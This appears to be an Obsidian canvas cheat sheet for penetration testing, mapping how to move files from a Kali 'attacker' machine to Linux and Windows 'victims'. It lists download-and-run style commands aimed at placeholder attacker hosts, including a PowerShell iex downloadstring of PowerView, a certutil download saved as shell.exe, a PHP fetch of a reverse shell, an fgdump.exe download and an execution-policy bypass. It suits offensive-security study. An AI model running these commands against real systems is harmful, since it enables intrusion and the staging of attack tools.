{
	"nodes":[
		{"type":"group","id":"c2413251d995a6fc","x":-1600,"y":1680,"width":5440,"height":2960,"label":"Transfer files to VICTIM"},
		{"type":"group","id":"8efeb60864543ccb","x":-1440,"y":1840,"width":2540,"height":2680,"color":"1","label":"Kali Attacker "},
		{"type":"group","id":"f41c157d56eb1d97","x":1500,"y":2840,"width":2140,"height":1680,"color":"5","label":"Windows Victim"},
		{"type":"group","id":"4c42a929ddddf209","x":1500,"y":1840,"width":2140,"height":910,"color":"4","label":"Linux Victim"},
		{"type":"text","text":"","id":"1f0cc683a5d4144e","x":980,"y":2720,"width":60,"height":60,"color":"#813dff"},
		{"type":"text","text":"","id":"0887979d73fc6e82","x":980,"y":2540,"width":60,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"","id":"e77cabc74a6b8e6b","x":980,"y":2400,"width":60,"height":60,"color":"#009e1a"},
		{"type":"text","text":"","id":"b92ed687ac196517","x":1530,"y":2510,"width":60,"height":60,"color":"2"},
		{"type":"text","text":"","id":"ade906f9fa3719d4","x":1530,"y":2325,"width":60,"height":155,"color":"#d8be13"},
		{"type":"text","text":"```bash\nget <FILE-NAME>\n```","id":"3076e110475c68ec","x":1700,"y":2190,"width":280,"height":60},
		{"type":"text","text":"```bash\nsudo systemctl start ssh\n```","id":"98870cc09701b962","x":1945,"y":1880,"width":609,"height":60},
		{"type":"text","text":"","id":"f26fedc63ca81598","x":1530,"y":1880,"width":60,"height":60,"color":"#009e1a"},
		{"type":"text","text":"SSH","id":"c3fc32194eed48db","x":2796,"y":1880,"width":156,"height":60},
		{"type":"text","text":"","id":"7dd0c1a9782a1259","x":980,"y":2812,"width":60,"height":557,"color":"#d8be13"},
		{"type":"text","text":"```bash\npython3 /opt/wwwtree/wwwtree.py -r ~/transfer/ -i tun0 -p 80\n```","id":"5922d4f5d1a9e2a7","x":-142,"y":2811,"width":830,"height":58},
		{"type":"text","text":"Python","id":"07950e01bf06d71a","x":-142,"y":2890,"width":125,"height":60},
		{"type":"text","text":"WWWtree","id":"526d6981bca2e568","x":-380,"y":2811,"width":140,"height":60},
		{"type":"text","text":"Apache","id":"d7822d10d4dba5b5","x":-380,"y":3130,"width":140,"height":60},
		{"type":"text","text":"\n```bash\nsystemctl start pure-ftpd\n```\n","id":"c8cd070b275877d0","x":-142,"y":2720,"width":609,"height":60},
		{"type":"text","text":"```bash\nsudo systemctl start ssh\n```","id":"020fb08309842c83","x":-141,"y":2540,"width":609,"height":60},
		{"type":"text","text":"```bash\nsudo socat TCP4-LISTEN:443,fork file:<FILE-NAME>\n```","id":"bb057ca10ad0dd92","x":-369,"y":3580,"width":722,"height":60},
		{"type":"text","text":"pure FTP","id":"2bd6bbbe250c523b","x":-380,"y":2720,"width":140,"height":60},
		{"type":"text","text":"```bash\nscp local_file.txt USER@HOST_IP:/tmp/remote_file.txt\n```","id":"0b103e4040e84c63","x":-142,"y":2400,"width":854,"height":60},
		{"type":"text","text":"FTP","id":"e7518bfe4e3d2a04","x":-800,"y":2720,"width":250,"height":60},
		{"type":"text","text":"SCP","id":"d19eaf65d255b3e9","x":-800,"y":2400,"width":250,"height":60},
		{"type":"text","text":"Web","id":"a5657be0052b21b4","x":-800,"y":3050,"width":250,"height":60},
		{"type":"text","text":"SSH","id":"de812d21785b5051","x":-800,"y":2540,"width":250,"height":60},
		{"type":"text","text":"Host file(s)","id":"35f4a7cf15b3565e","x":-1160,"y":3220,"width":160,"height":60},
		{"type":"text","text":"Ruby","id":"6a8be167951cda24","x":-380,"y":3260,"width":140,"height":60},
		{"type":"text","text":"SMB","id":"b597428b8f16e360","x":-789,"y":3720,"width":250,"height":60},
		{"type":"text","text":"Socat","id":"bb61437274480bce","x":-789,"y":3580,"width":250,"height":60},
		{"type":"text","text":"","id":"14f23e71f8aef871","x":980,"y":3860,"width":60,"height":180,"color":"#e100ff"},
		{"type":"text","text":"","id":"99bfa859aa5eaaf0","x":980,"y":3720,"width":60,"height":60,"color":"#00ccff"},
		{"type":"text","text":"","id":"9fc36171dc101cae","x":980,"y":3580,"width":60,"height":60,"color":"4"},
		{"type":"text","text":"```bash\nsudo impacket-smbserver share $(pwd) -smb2support\n```","id":"41ba20af7431563f","x":-131,"y":3720,"width":567,"height":60},
		{"type":"text","text":"","id":"319bed429aa52a55","x":1560,"y":3139,"width":60,"height":60,"color":"#813dff"},
		{"type":"text","text":"```bash\nnc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe\n```","id":"76744c6f93744040","x":-369,"y":3465,"width":837,"height":50},
		{"type":"text","text":"\n```bash\nsudo python3 -m http.server 80\n```\n","id":"bd37525c2ecc9446","x":26,"y":2981,"width":441,"height":58},
		{"type":"text","text":"\n```bash\nruby -run -e httpd . -p 9000\n```","id":"7b31c6a91011cf35","x":-142,"y":3220,"width":441,"height":58},
		{"type":"text","text":"```bash\nsudo php -S 0.0.0.0:80\n```","id":"7cc43aa399754661","x":-142,"y":3050,"width":367,"height":60},
		{"type":"text","text":"```bash\nservice apache2 start\n```","id":"8f24b4215a1826b7","x":-142,"y":3130,"width":367,"height":60},
		{"type":"text","text":"netcat","id":"e5712d4396ae46c0","x":-789,"y":3460,"width":250,"height":60},
		{"type":"text","text":"","id":"943c0a1d0316a739","x":980,"y":3455,"width":60,"height":60,"color":"2"},
		{"type":"text","text":"impacket","id":"7182ca8d7591ad6f","x":-369,"y":3720,"width":140,"height":60},
		{"type":"text","text":"\n```bash\nsudo python -m SimpleHTTPServer 80\n```\n","id":"67bb08010ab9eef8","x":26,"y":2891,"width":441,"height":58},
		{"type":"text","text":"Python3","id":"af8b9d80fb156bb2","x":-142,"y":2979,"width":125,"height":60},
		{"type":"text","text":"Python","id":"83d6d35049878162","x":-380,"y":2921,"width":140,"height":60},
		{"type":"text","text":"PHP","id":"77071a338b4ae4d0","x":-380,"y":3050,"width":140,"height":60},
		{"type":"text","text":"\n```bash\nruby -rwebrick -e \"WEBrick::HTTPServer.new(:Port => 8080, :DocumentRoot => Dir.pwd).start\"\n```\n","id":"1170d27f7607b36c","x":-142,"y":3310,"width":922,"height":58},
		{"type":"text","text":"Single file","id":"7c31c9ead21cc3be","x":2434,"y":3248,"width":160,"height":60},
		{"type":"text","text":"```bash\nwget http://<IP-ATTACKER>/<FILE> \n```","id":"165459a5028efd67","x":2225,"y":2420,"width":493,"height":60},
		{"type":"text","text":"```bash\ncurl http://<IP-ATTACKER>/<FILE> -o <file>\n```","id":"3df317fb1a242dd5","x":2225,"y":2323,"width":493,"height":60},
		{"type":"text","text":"Multiple files","id":"3eaa0c2c8318667c","x":2434,"y":3139,"width":160,"height":60},
		{"type":"text","text":"Web","id":"d45048da5b52c0e8","x":2796,"y":2373,"width":156,"height":60},
		{"type":"text","text":"```powershell\ncurl http://<IP-ATTACKER>/<FILE> -o <file>\n```","id":"d22b3c3500248db8","x":1740,"y":3628,"width":680,"height":60},
		{"type":"text","text":"```powershell\niex(new-object net.webclient).downloadstring('(https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')\n```","id":"6d349441e1653893","x":1740,"y":3365,"width":680,"height":103},
		{"type":"text","text":"```powershell\npowershell -c \"(new-object System.Net.WebClient).DownloadFile('http://<IP-ATTACKER>/wget.exe','C:\\Users\\Public\\Desktop\\wget.exe')\"\n```","id":"24ce1c2b4adf4743","x":1740,"y":3488,"width":680,"height":120},
		{"type":"text","text":"```cmd\nopen <IP-ATTACKER> \n<USERNAME>\n<PASSWORD>\nbinary\nmget file.exe\ndisconnect\nquit\n```","id":"0a7dd691df937c39","x":2040,"y":2860,"width":250,"height":260},
		{"type":"text","text":"```bash\nftp <IP-ATTACKER>\n```","id":"c74e4313eb6bdacf","x":2694,"y":3248,"width":258,"height":60},
		{"type":"text","text":"FTP","id":"1b428995d89bac51","x":3000,"y":3248,"width":156,"height":60},
		{"type":"text","text":"```powershell\nPowerShell.exe -ExecutionPolicy Bypass\n```","id":"33af09b16147aa82","x":2457,"y":3387,"width":418,"height":60},
		{"type":"text","text":"Web","id":"e81977e44c9be781","x":3000,"y":3578,"width":156,"height":60},
		{"type":"text","text":"```bash\nnc -nlvp 4444 > incoming.sh\n```","id":"17dcfbccec1e4758","x":2225,"y":2520,"width":493,"height":50},
		{"type":"text","text":"netcat","id":"41096355fc79982d","x":2796,"y":2520,"width":156,"height":50},
		{"type":"text","text":"```php\n<?php file_put_contents(\"/tmp/php-reverse-shell.txt\", fopen(\"http://<IP-ATTACKER>/php-reverse-shell.txt\", \"r\")); ?>\n```","id":"e74258decaf9ca8c","x":1740,"y":3780,"width":940,"height":100},
		{"type":"text","text":"","id":"da3be8f1fa1efbaa","x":1560,"y":3980,"width":60,"height":60,"color":"2"},
		{"type":"text","text":"```cmd\nnc -nlvp 4444 > incoming.exe\n```","id":"4f05cb4216e3f2ff","x":1740,"y":3985,"width":680,"height":50},
		{"type":"text","text":"```cmd\npython.exe -c \"import urllib2; print urllib2.urlopen('http://<IP-ATTACKER>/fgdump.exe').read()\" > fgdump.exe\n```","id":"0c49a86fdbccf304","x":1740,"y":3890,"width":940,"height":75},
		{"type":"text","text":"```cmd\ncertutil -urlcache -f http://IP-attacker/filename.exe shell.exe\n```","id":"3d4c72e8cf7375db","x":1740,"y":3708,"width":680,"height":60},
		{"type":"text","text":"```bash\nftp <IP-ATTACKER>\n```","id":"5f3d917251ff518b","x":2460,"y":2160,"width":258,"height":60},
		{"type":"text","text":"Netcat","id":"2beb0f379f15cf91","x":3000,"y":3980,"width":156,"height":60},
		{"type":"text","text":"SCP","id":"162af4fbd5ef72dd","x":2796,"y":1980,"width":156,"height":60},
		{"type":"text","text":"PHP","id":"42730656212191a2","x":2760,"y":3800,"width":115,"height":60},
		{"type":"text","text":"Python","id":"150f8925c89b03a9","x":2760,"y":3898,"width":115,"height":60},
		{"type":"text","text":"FTP","id":"b43cdd2457a7e306","x":2796,"y":2160,"width":156,"height":60},
		{"type":"text","text":"Single file","id":"5bdd930adaab59f8","x":2153,"y":2190,"width":160,"height":60},
		{"type":"text","text":"```cmd\nsocat TCP4:10.11.0.4:443 file:<FILE-NAME>,create\n```","id":"01242ee3bd640059","x":1740,"y":4090,"width":680,"height":60},
		{"type":"text","text":"Multiple files","id":"ceca3ee191cc6b7b","x":2153,"y":2110,"width":160,"height":60},
		{"type":"text","text":"Socat","id":"c69ddc1b9670e9d5","x":3000,"y":4090,"width":156,"height":60},
		{"type":"text","text":"Download file(s)","id":"ec15a9d60e148a70","x":3190,"y":2160,"width":220,"height":60},
		{"type":"text","text":"","id":"1bf9e55a732d0cd2","x":1530,"y":2160,"width":60,"height":60,"color":"#813dff"},
		{"type":"text","text":"```bash\nmget <FILE-*>\n```","id":"f54f7348f66ffc4e","x":1700,"y":2110,"width":280,"height":60},
		{"type":"text","text":"","id":"f0f11e4dd6631dc6","x":1530,"y":1980,"width":60,"height":60,"color":"#ff00bb"},
		{"type":"text","text":"```bash\nscp user@ATTACKER-IP:/path/to/remotefile.sh /Local/Target/Detination\n```","id":"4eeb888b123623cf","x":1700,"y":1980,"width":854,"height":60},
		{"type":"text","text":"```cmd\nftp -i -s:ftp.txt\n```","id":"81751f83cae24cbb","x":1770,"y":2960,"width":250,"height":60},
		{"type":"text","text":"Just copy via the GUI","id":"e654e7d64ef63509","x":2180,"y":4330,"width":240,"height":60},
		{"type":"text","text":"```cmd\ncopy \\\\0.0.0.0\\share\\filename.exe C:\\users\\public\\music\\filename.exe\n```","id":"5bf710169d6525f9","x":1740,"y":4210,"width":680,"height":60},
		{"type":"text","text":"SMB","id":"2ad3fca3d7ebf6d9","x":3000,"y":4210,"width":156,"height":60},
		{"type":"text","text":"RDP","id":"87cbabd65a20471d","x":3000,"y":4330,"width":156,"height":60},
		{"type":"text","text":"winRM","id":"664adbb7ea9bdbbc","x":3000,"y":4410,"width":156,"height":60},
		{"type":"text","text":"","id":"206d8a6ac4824b5e","x":1560,"y":4210,"width":60,"height":60,"color":"#00ccff"},
		{"type":"text","text":"","id":"04b72fc063be29c4","x":1560,"y":4330,"width":60,"height":60,"color":"#e100ff"},
		{"type":"text","text":"","id":"053e7e8f3c315c09","x":1560,"y":4410,"width":60,"height":60,"color":"3"},
		{"type":"text","text":"","id":"a84cf981923b7f68","x":1560,"y":3338,"width":60,"height":420,"color":"#d8be13"},
		{"type":"text","text":"```bash\nget <FILE-NAME>\n```","id":"669a918965c11e35","x":1740,"y":3248,"width":280,"height":60},
		{"type":"text","text":"```bash\nmget <FILE-*>\n```","id":"9e67a4eb98d2ac33","x":1740,"y":3139,"width":280,"height":60},
		{"type":"text","text":"","id":"321f3a413498b2ce","x":1560,"y":4090,"width":60,"height":60,"color":"4"},
		{"type":"text","text":"Download file(s)","id":"6f7a5c655bd1b965","x":3320,"y":3708,"width":220,"height":60},
		{"type":"text","text":"","id":"1ca60381a66b2f39","x":981,"y":4150,"width":60,"height":60,"color":"3"},
		{"type":"text","text":"```bash\nupload filename.exe\n```","id":"93849ad34b5459f2","x":122,"y":4150,"width":250,"height":60},
		{"type":"text","text":"Evil-winRM","id":"27670e51f3e77954","x":-788,"y":4150,"width":250,"height":60},
		{"type":"text","text":"```bash\nevil-winrm\n```","id":"732d7c2c11f71f65","x":-368,"y":4150,"width":419,"height":60},
		{"type":"text","text":"```bash\nrdesktop $ip -u <username> -p <password> -r disk:tmp=$(pwd)\n```","id":"5ea083e18c74ea96","x":-200,"y":3860,"width":722,"height":60},
		{"type":"text","text":"rdesktop","id":"e51aedea84cc953d","x":-438,"y":3860,"width":140,"height":60},
		{"id":"457185bcd0b2c56f","x":-200,"y":3980,"width":1091,"height":60,"type":"text","text":"```bash\nxfreerdp /v:$ip /u:<username> /p:<password> /dynamic-resolution +clipboard /drive:share,/home/kali/project\n```"},
		{"type":"text","text":"xfreerdp","id":"0b5430109f1aee95","x":-437,"y":3980,"width":140,"height":60},
		{"type":"text","text":"RDP","id":"a6b0107ca202cb70","x":-820,"y":3920,"width":250,"height":60}
	],
	"edges":[
		{"id":"fbb77b8cdbdc9c0d","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"e7518bfe4e3d2a04","toSide":"left"},
		{"id":"fcbf07ec54779a6f","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"a5657be0052b21b4","toSide":"left"},
		{"id":"78c177a4e17e3da0","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"b597428b8f16e360","toSide":"left"},
		{"id":"ea8321a7738cda60","fromNode":"a5657be0052b21b4","fromSide":"right","toNode":"83d6d35049878162","toSide":"left"},
		{"id":"feeb178b804c284c","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"a6b0107ca202cb70","toSide":"left"},
		{"id":"ac57f7e76d115ab8","fromNode":"83d6d35049878162","fromSide":"right","toNode":"07950e01bf06d71a","toSide":"left"},
		{"id":"cbb7731785189149","fromNode":"83d6d35049878162","fromSide":"right","toNode":"af8b9d80fb156bb2","toSide":"left"},
		{"id":"eb5724daa8882c12","fromNode":"a5657be0052b21b4","fromSide":"right","toNode":"526d6981bca2e568","toSide":"left"},
		{"id":"c9ed8c98a9f9cd7c","fromNode":"a5657be0052b21b4","fromSide":"right","toNode":"77071a338b4ae4d0","toSide":"left"},
		{"id":"68d7c67f635e5f9f","fromNode":"a5657be0052b21b4","fromSide":"right","toNode":"d7822d10d4dba5b5","toSide":"left"},
		{"id":"cb3c009f6d4d8d34","fromNode":"a5657be0052b21b4","fromSide":"right","toNode":"6a8be167951cda24","toSide":"left"},
		{"id":"b91afa9f51c4cdd2","fromNode":"b597428b8f16e360","fromSide":"right","toNode":"7182ca8d7591ad6f","toSide":"left"},
		{"id":"5bfd2e9803c16bb1","fromNode":"7182ca8d7591ad6f","fromSide":"right","toNode":"41ba20af7431563f","toSide":"left"},
		{"id":"9ac5293aeba2f349","fromNode":"af8b9d80fb156bb2","fromSide":"right","toNode":"bd37525c2ecc9446","toSide":"left"},
		{"id":"6a903b187c87687c","fromNode":"07950e01bf06d71a","fromSide":"right","toNode":"67bb08010ab9eef8","toSide":"left"},
		{"id":"588d7a94312308c2","fromNode":"526d6981bca2e568","fromSide":"right","toNode":"5922d4f5d1a9e2a7","toSide":"left"},
		{"id":"ae2e1e8146ee7f2b","fromNode":"77071a338b4ae4d0","fromSide":"right","toNode":"7cc43aa399754661","toSide":"left"},
		{"id":"db9a5392ae575ddb","fromNode":"d7822d10d4dba5b5","fromSide":"right","toNode":"8f24b4215a1826b7","toSide":"left"},
		{"id":"ef37fb22c040f4d5","fromNode":"6a8be167951cda24","fromSide":"right","toNode":"1170d27f7607b36c","toSide":"left"},
		{"id":"3621e4366425a701","fromNode":"6a8be167951cda24","fromSide":"right","toNode":"7b31c6a91011cf35","toSide":"left"},
		{"id":"97279056f8157603","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"e5712d4396ae46c0","toSide":"left"},
		{"id":"ce9a32f5d5b02606","fromNode":"e5712d4396ae46c0","fromSide":"right","toNode":"76744c6f93744040","toSide":"left"},
		{"id":"7fa4432cbabf4b63","fromNode":"a6b0107ca202cb70","fromSide":"right","toNode":"e51aedea84cc953d","toSide":"left"},
		{"id":"781356faa2107d01","fromNode":"e51aedea84cc953d","fromSide":"right","toNode":"5ea083e18c74ea96","toSide":"left"},
		{"id":"0c9df0ce5dec68d2","fromNode":"1170d27f7607b36c","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"6c92f1e124eb3edd","fromNode":"7b31c6a91011cf35","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"bfb19890bad49a80","fromNode":"8f24b4215a1826b7","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"3e944cd077abe74c","fromNode":"7cc43aa399754661","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"1c4b415cf7fdb778","fromNode":"bd37525c2ecc9446","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"bd23cd972d58ce03","fromNode":"67bb08010ab9eef8","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"b4889f4f2f527ceb","fromNode":"5922d4f5d1a9e2a7","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"555a01160ee57a59","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"b43cdd2457a7e306","toSide":"right"},
		{"id":"fcc549cfbee7f550","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"d45048da5b52c0e8","toSide":"right"},
		{"id":"9a44997268df2927","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"41096355fc79982d","toSide":"right"},
		{"id":"1b943bf5b28ad802","fromNode":"d45048da5b52c0e8","fromSide":"left","toNode":"3df317fb1a242dd5","toSide":"right"},
		{"id":"b06c2635c28113b6","fromNode":"d45048da5b52c0e8","fromSide":"left","toNode":"165459a5028efd67","toSide":"right"},
		{"id":"94a70fe5b2e8a501","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"1b428995d89bac51","toSide":"right"},
		{"id":"b23cc9d4ba0a358b","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"e81977e44c9be781","toSide":"right"},
		{"id":"91945b68df2c343b","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"2beb0f379f15cf91","toSide":"right"},
		{"id":"dfe6b6e0be9a3930","fromNode":"e81977e44c9be781","fromSide":"left","toNode":"d22b3c3500248db8","toSide":"right"},
		{"id":"4c0bb9b73e88d303","fromNode":"e81977e44c9be781","fromSide":"left","toNode":"3d4c72e8cf7375db","toSide":"right"},
		{"id":"27046b940f29edbf","fromNode":"5ea083e18c74ea96","fromSide":"right","toNode":"14f23e71f8aef871","toSide":"left"},
		{"id":"3637b4497fdd3063","fromNode":"87cbabd65a20471d","fromSide":"left","toNode":"e654e7d64ef63509","toSide":"right"},
		{"id":"bbe60e18cceddb3d","fromNode":"04b72fc063be29c4","fromSide":"left","toNode":"14f23e71f8aef871","toSide":"right","color":"#e100ff"},
		{"id":"e9de75b255a4bfca","fromNode":"d22b3c3500248db8","fromSide":"left","toNode":"a84cf981923b7f68","toSide":"right"},
		{"id":"7312e8a5c879b2ec","fromNode":"3d4c72e8cf7375db","fromSide":"left","toNode":"a84cf981923b7f68","toSide":"right"},
		{"id":"b5083ffca6ea3566","fromNode":"a84cf981923b7f68","fromSide":"left","toNode":"7dd0c1a9782a1259","toSide":"right","color":"#d8be13"},
		{"id":"fe0e4522b14b9d40","fromNode":"ade906f9fa3719d4","fromSide":"left","toNode":"7dd0c1a9782a1259","toSide":"right","color":"#d8be13"},
		{"id":"e67efda54dadeec1","fromNode":"165459a5028efd67","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
		{"id":"ff2eaa5d63152178","fromNode":"3df317fb1a242dd5","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
		{"id":"9ac318ecb057e5c6","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"2ad3fca3d7ebf6d9","toSide":"right"},
		{"id":"737273cbfb38af62","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"87cbabd65a20471d","toSide":"right"},
		{"id":"d605070482ce80e0","fromNode":"2ad3fca3d7ebf6d9","fromSide":"left","toNode":"5bf710169d6525f9","toSide":"right"},
		{"id":"5c5ce08b989a2a41","fromNode":"5bf710169d6525f9","fromSide":"left","toNode":"206d8a6ac4824b5e","toSide":"right"},
		{"id":"606fd6b8dc8b4145","fromNode":"41ba20af7431563f","fromSide":"right","toNode":"99bfa859aa5eaaf0","toSide":"left"},
		{"id":"71f8237bd5ea08fc","fromNode":"206d8a6ac4824b5e","fromSide":"left","toNode":"99bfa859aa5eaaf0","toSide":"right","color":"#00ccff"},
		{"id":"4a97dde41300da34","fromNode":"e654e7d64ef63509","fromSide":"left","toNode":"04b72fc063be29c4","toSide":"right"},
		{"id":"00e482679c957cfd","fromNode":"76744c6f93744040","fromSide":"right","toNode":"943c0a1d0316a739","toSide":"left"},
		{"id":"e09740b5811f2461","fromNode":"da3be8f1fa1efbaa","fromSide":"left","toNode":"943c0a1d0316a739","toSide":"right","color":"2"},
		{"id":"574911bdc5942a6a","fromNode":"b92ed687ac196517","fromSide":"left","toNode":"943c0a1d0316a739","toSide":"right","color":"2"},
		{"id":"2ec842f4b75e3a52","fromNode":"2beb0f379f15cf91","fromSide":"left","toNode":"4f05cb4216e3f2ff","toSide":"right"},
		{"id":"f1f0687753284b2c","fromNode":"4f05cb4216e3f2ff","fromSide":"left","toNode":"da3be8f1fa1efbaa","toSide":"right"},
		{"id":"430672ec9b05228c","fromNode":"41096355fc79982d","fromSide":"left","toNode":"17dcfbccec1e4758","toSide":"right"},
		{"id":"8a896c499fa58b95","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"bb61437274480bce","toSide":"left"},
		{"id":"86b22e6c402c4a33","fromNode":"bb61437274480bce","fromSide":"right","toNode":"bb057ca10ad0dd92","toSide":"left"},
		{"id":"d872b01972d1240d","fromNode":"bb057ca10ad0dd92","fromSide":"right","toNode":"9fc36171dc101cae","toSide":"left"},
		{"id":"c258558ff55534bc","fromNode":"321f3a413498b2ce","fromSide":"left","toNode":"9fc36171dc101cae","toSide":"right","color":"4"},
		{"id":"c90b057b9efb950c","fromNode":"01242ee3bd640059","fromSide":"left","toNode":"321f3a413498b2ce","toSide":"right"},
		{"id":"bbfb9e054ab7ff60","fromNode":"c69ddc1b9670e9d5","fromSide":"left","toNode":"01242ee3bd640059","toSide":"right"},
		{"id":"3761f7f37883bb23","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"c69ddc1b9670e9d5","toSide":"right"},
		{"id":"17a2f91364915e49","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"de812d21785b5051","toSide":"left"},
		{"id":"25e6ccccf41b7e42","fromNode":"e7518bfe4e3d2a04","fromSide":"right","toNode":"2bd6bbbe250c523b","toSide":"left"},
		{"id":"43858a6311868ce1","fromNode":"2bd6bbbe250c523b","fromSide":"right","toNode":"c8cd070b275877d0","toSide":"left"},
		{"id":"6e8140a88c2e72b0","fromNode":"c8cd070b275877d0","fromSide":"right","toNode":"1f0cc683a5d4144e","toSide":"left"},
		{"id":"85dfb871b0d94439","fromNode":"1bf9e55a732d0cd2","fromSide":"left","toNode":"1f0cc683a5d4144e","toSide":"right","color":"#813dff"},
		{"id":"2a927686cd669a99","fromNode":"319bed429aa52a55","fromSide":"left","toNode":"1f0cc683a5d4144e","toSide":"right","color":"#813dff"},
		{"id":"33e5f5be632d266d","fromNode":"5f3d917251ff518b","fromSide":"left","toNode":"ceca3ee191cc6b7b","toSide":"right"},
		{"id":"ee5b5971cb455eba","fromNode":"5f3d917251ff518b","fromSide":"left","toNode":"5bdd930adaab59f8","toSide":"right"},
		{"id":"ff6cc8c51e8f9468","fromNode":"ceca3ee191cc6b7b","fromSide":"left","toNode":"f54f7348f66ffc4e","toSide":"right"},
		{"id":"3a799841a2fb2988","fromNode":"5bdd930adaab59f8","fromSide":"left","toNode":"3076e110475c68ec","toSide":"right"},
		{"id":"2780f51ddbf79095","fromNode":"3076e110475c68ec","fromSide":"left","toNode":"1bf9e55a732d0cd2","toSide":"right"},
		{"id":"f906df908c9c67e2","fromNode":"f54f7348f66ffc4e","fromSide":"left","toNode":"1bf9e55a732d0cd2","toSide":"right"},
		{"id":"e9e38d20c4214476","fromNode":"b43cdd2457a7e306","fromSide":"left","toNode":"5f3d917251ff518b","toSide":"right"},
		{"id":"2767f83496e3f037","fromNode":"17dcfbccec1e4758","fromSide":"left","toNode":"b92ed687ac196517","toSide":"right"},
		{"id":"2fc5f071992a7539","fromNode":"24ce1c2b4adf4743","fromSide":"left","toNode":"a84cf981923b7f68","toSide":"right"},
		{"id":"d288eb5f8992a22c","fromNode":"e81977e44c9be781","fromSide":"left","toNode":"24ce1c2b4adf4743","toSide":"right"},
		{"id":"4722a4cc33c6f32a","fromNode":"4eeb888b123623cf","fromSide":"left","toNode":"f0f11e4dd6631dc6","toSide":"right"},
		{"id":"7097c64f81dca066","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"162af4fbd5ef72dd","toSide":"right"},
		{"id":"c142cfd00e130eba","fromNode":"162af4fbd5ef72dd","fromSide":"left","toNode":"4eeb888b123623cf","toSide":"right"},
		{"id":"a85e2235fc94321f","fromNode":"f0f11e4dd6631dc6","fromSide":"left","toNode":"0887979d73fc6e82","toSide":"right","color":"#ff00bb"},
		{"id":"26441e8e4a771f66","fromNode":"de812d21785b5051","fromSide":"right","toNode":"020fb08309842c83","toSide":"left"},
		{"id":"5da6e941a784bd0e","fromNode":"020fb08309842c83","fromSide":"right","toNode":"0887979d73fc6e82","toSide":"left"},
		{"id":"a865a035b2f9dd19","fromNode":"7c31c9ead21cc3be","fromSide":"left","toNode":"669a918965c11e35","toSide":"right"},
		{"id":"61c24f9e36b3050e","fromNode":"c74e4313eb6bdacf","fromSide":"left","toNode":"7c31c9ead21cc3be","toSide":"right"},
		{"id":"5169b8965f49dd25","fromNode":"1b428995d89bac51","fromSide":"left","toNode":"c74e4313eb6bdacf","toSide":"right"},
		{"id":"af015ecf7b7cb515","fromNode":"669a918965c11e35","fromSide":"left","toNode":"319bed429aa52a55","toSide":"right"},
		{"id":"1595b3ff03814a70","fromNode":"81751f83cae24cbb","fromSide":"left","toNode":"319bed429aa52a55","toSide":"right"},
		{"id":"16243d301e2b0c8e","fromNode":"0a7dd691df937c39","fromSide":"left","toNode":"81751f83cae24cbb","toSide":"right"},
		{"id":"cb27c52996a4f7e3","fromNode":"3eaa0c2c8318667c","fromSide":"left","toNode":"0a7dd691df937c39","toSide":"right"},
		{"id":"1bff59db041d7480","fromNode":"c74e4313eb6bdacf","fromSide":"left","toNode":"3eaa0c2c8318667c","toSide":"right"},
		{"id":"4810ecdbfcaaba45","fromNode":"3eaa0c2c8318667c","fromSide":"left","toNode":"9e67a4eb98d2ac33","toSide":"right"},
		{"id":"2d8a14dab4fd4beb","fromNode":"9e67a4eb98d2ac33","fromSide":"left","toNode":"319bed429aa52a55","toSide":"right"},
		{"id":"9117ce04aed4f914","fromNode":"e81977e44c9be781","fromSide":"left","toNode":"33af09b16147aa82","toSide":"right"},
		{"id":"21dddaf56eee6de3","fromNode":"33af09b16147aa82","fromSide":"left","toNode":"6d349441e1653893","toSide":"right"},
		{"id":"2f6c1601fa14173f","fromNode":"6d349441e1653893","fromSide":"left","toNode":"a84cf981923b7f68","toSide":"right"},
		{"id":"20f0ebd752730be6","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"c3fc32194eed48db","toSide":"right"},
		{"id":"1dac01fecac18110","fromNode":"c3fc32194eed48db","fromSide":"left","toNode":"98870cc09701b962","toSide":"right"},
		{"id":"053d94031f6d6977","fromNode":"98870cc09701b962","fromSide":"left","toNode":"f26fedc63ca81598","toSide":"right"},
		{"id":"c28ee4bca2807ed9","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"d19eaf65d255b3e9","toSide":"left"},
		{"id":"ab03ea506acd0980","fromNode":"d19eaf65d255b3e9","fromSide":"right","toNode":"0b103e4040e84c63","toSide":"left"},
		{"id":"65d187fe19837d5e","fromNode":"0b103e4040e84c63","fromSide":"right","toNode":"e77cabc74a6b8e6b","toSide":"left"},
		{"id":"827ef759fc8e86fa","fromNode":"e77cabc74a6b8e6b","fromSide":"right","toNode":"f26fedc63ca81598","toSide":"left","color":"#009e1a"},
		{"id":"5f741bb1a1a71fad","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"664adbb7ea9bdbbc","toSide":"right"},
